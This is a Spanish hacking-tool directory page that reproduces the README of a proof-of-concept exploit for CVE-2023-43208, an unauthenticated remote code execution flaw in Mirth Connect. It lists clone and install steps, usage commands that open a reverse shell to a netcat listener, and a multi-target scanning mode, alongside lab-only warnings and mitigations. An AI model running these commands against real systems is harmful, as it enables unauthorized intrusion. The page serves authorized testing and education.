Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
PoC-2023-43208 — Un exploit de prueba de concepto para CVE-2023-43208, una vulnerabilidad de ejecución remota de código en Mirth Connect anterior a la versión 4.4.1. | Kitploit
Herramientas/GitHubGitHub/mkirahmet/poc-2023-43208
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubmkirahmet/poc-2023-43208

PoC-2023-43208

Un exploit de prueba de concepto para CVE-2023-43208, una vulnerabilidad de ejecución remota de código en Mirth Connect anterior a la versión 4.4.1.

Ver Repositorio
31hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-43208-EXPLOIT

Exploit de Ejecución Remota de Código (RCE) en Mirth Connect

Python Version Version CVE Lab Use Only

⚠️ SOLO PARA USO EDUCATIVO Y EN LABORATORIO ⚠️

Un exploit de prueba de concepto para CVE-2023-43208, una vulnerabilidad de ejecución remota de código en Mirth Connect anterior a la versión 4.4.1.

🚨 AVISO LEGAL IMPORTANTE

Esta herramienta es estrictamente para:

  • 🧪 Fines educativos
  • 🔬 Pruebas de seguridad autorizadas en entornos de laboratorio
  • 📚 Investigación y aprendizaje en ciberseguridad

NO LA USE:

  • ❌ Contra sistemas que no le pertenecen
  • ❌ Sin permiso explícito por escrito
  • ❌ En entornos de producción
  • ❌ Para fines ilegales o maliciosos
  • Usted es responsable de cumplir con todas las leyes y regulaciones aplicables. El mal uso de esta herramienta puede dar lugar a cargos penales.

    📋 Descripción

    Este exploit ataca la vulnerabilidad de deserialización XML en el endpoint /api/users de Mirth Connect, permitiendo la ejecución remota de código no autenticada en versiones afectadas (< 4.4.1).

    Esta es una vulnerabilidad CRÍTICA y solo debe probarse en entornos de laboratorio aislados con sus propios sistemas.

    🔧 Requisitos

    • Python 3.7 o superior
    • Paquetes requeridos listados en requirements.txt
    • UN ENTORNO DE LABORATORIO con una instancia vulnerable de Mirth Connect

    🚀 Instalación

    Clonar el repositorio

    git clone https://github.com/M0h4/CVE-2023-43208-EXPLOIT.git cd CVE-2023-43208-EXPLOIT

    Instalar requisitos

    pip install -r requirements.txt

    💻 Uso (SOLO EN LABORATORIO)

    Modo interactivo (Recomendado para laboratorio)

    root@kitploit:~
    python exploit.py
    

    Modo línea de comandos

    root@kitploit:~
    # Explotación de un solo objetivo (SOLO EN LABORATORIO)
    python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444
    
    # Escanear múltiples objetivos desde un archivo (SOLO EN LABORATORIO)
    python exploit.py -f targets.txt -t 50 -o vulnerable.txt
    
    # Modo no interactivo (SOLO EN LABORATORIO)
    python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444 --no-interactive
    

    Opciones

    root@kitploit:~
    -u, --url       URL del objetivo a explotar (SOLO EN LABORATORIO)
    -lh, --lhost    Host de escucha (su IP)
    -lp, --lport    Puerto de escucha
    -f, --file      Archivo que contiene las URL de los objetivos a escanear
    -o, --output    Archivo de salida para guardar los resultados del escaneo
    -t, --threads   Número de hilos para el escaneo (por defecto: 50)
    --no-interactive Ejecutar en modo no interactivo
    

    🎯 Ejemplo de Entorno de Laboratorio

    Configure su laboratorio:

    1. Instale la versión vulnerable de Mirth Connect (< 4.4.1) en una máquina virtual aislada
    2. Use una red controlada (por ejemplo, NAT/Solo-anfitrión en VirtualBox/VMware)
    3. Nunca la exponga a internet

    Inicie su listener:

    root@kitploit:~
    ncat -lnvp 4444
    # o
    nc -lnvp 4444
    

    Ejecute el exploit en su laboratorio:

    root@kitploit:~
    python exploit.py -u https://192.168.1.100:8443 -lh 192.168.1.50 -lp 4444
    

    🧪 Requisitos del Entorno de Prueba

    • Red/VLAN aislada
    • Solo máquinas virtuales
    • Sin datos de producción
    • Reglas de cortafuegos que bloqueen el acceso externo
    • Autorización adecuada documentada

    📝 Detalles Técnicos

    • Tipo de vulnerabilidad: Deserialización XML RCE
    • Versiones afectadas: Mirth Connect < 4.4.1
    • Versión corregida: 4.4.1 y posteriores
    • Puntuación CVSS: 9.8 (Crítica)
    • Vector de ataque: Red
    • Autenticación requerida: Ninguna

    El exploit utiliza gadgets de Commons Collections para lograr RCE a través del endpoint /api/users.

    🛡️ Medidas de Protección

    Si está ejecutando Mirth Connect:

    ✅ Actualice a la versión 4.4.1 o posterior

    ✅ Restrinja el acceso de red a las interfaces de administración

    ✅ Implemente autenticación adecuada

    ✅ Monitoree la presencia de payloads XML sospechosos

    👥 Créditos

    • Autores originales: K3ysTr0K3R & Chocapikk
    • Modificado por: M0h4
    • CVE: CVE-2023-43208

    ⚠️ ADVERTENCIA FINAL

    root@kitploit:~
    ╔══════════════════════════════════════════════════════════════╗
    ║  ESTA HERRAMIENTA ES SOLO PARA USO EN LABORATORIO            ║
    ║  El uso no autorizado es ILEGAL y NO ÉTICO                   ║
    ║  Usted asume TODO el riesgo y la responsabilidad             ║
    ║  El autor NO acepta responsabilidad por el mal uso           ║
    ╚══════════════════════════════════════════════════════════════╝
    
    Descargar herramienta